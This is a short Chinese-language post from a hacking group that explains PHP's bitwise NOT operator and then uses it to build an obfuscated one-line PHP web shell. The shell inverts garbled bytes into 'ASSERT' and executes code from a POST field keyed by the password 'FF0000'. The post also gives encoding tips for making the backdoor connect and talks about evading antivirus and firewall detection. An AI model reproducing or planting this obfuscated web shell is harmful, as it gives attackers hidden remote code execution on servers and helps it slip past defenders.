1)PHP ~位運算符
PHP: 位運算符 - http://www.php.net/manual/zh/language.operators.bitwise.php
前一段時間老外在twitter上爆出個有趣的東西,一串疑似亂碼的字符串訪問後卻能正常輸出1337,於是便有了以下研究成果。
~ $a Not(按位取反) 將 $a 中為 0 的位設為 1,反之亦然。
PHP 的 ini 設定 error_reporting 使用了按位的值,提供了關閉某個位的真實例子。要顯示除了提示級別之外的所有錯誤。
php.ini 中是這樣用的: E_ALL & ~E_NOTICE
具體運作方式是先取得 E_ALL 的值: 00000000000000000111011111111111
再取得 E_NOTICE 的值: 00000000000000000000000000001000
然後通過 ~ 將其取反: 11111111111111111111111111110111
最後再用按位與 AND(&)得到兩個值中都設定了(為 1)的位: 00000000000000000111011111110111
2)分析並重現
這個就是當時最原始的代碼實現效果:
當看到這個效果的時候最先想到的就是繞過防火牆等後門的實現,之後開始考慮這是哪種編碼方式?
後來同李普君測試中發現直接使用echo ~'1';等則會直接輸出以上的'亂碼',方到看完PHP官方~函數的解釋才恍然大悟。
那麼我們便可以開始寫一句話試試效果了:
?1
2
3
4
$x=~Ÿ¬¬º«;
$x($_POST[~¹¹ÏÏÏÏ]);
?>
這裡定義$x變量為ASSERT,然後密碼為FF0000直接鏈接後門便可,因為當位取反出來'亂碼'後我們再取一次反即可返回正常值。
3)關於編碼與免殺
當重現這個後門的時候我發現,直接Copy過來的直接HTTP狀態500,源頭是編碼問題,上面這種'亂碼'其實為西歐(ISO-8859-15)。
實際過程中我們遇到了多次後門無法鏈接出現500的錯誤均勢因為編碼問題,如果默認編碼無法識別將編碼方式保存為這種即可(GBKUTF8...均不能成功使用)
Author: Evi1m0 [Email: evi1m0#ff0000.cc]
From: 邪紅色信息安全組織 [FF0000 TeAm]
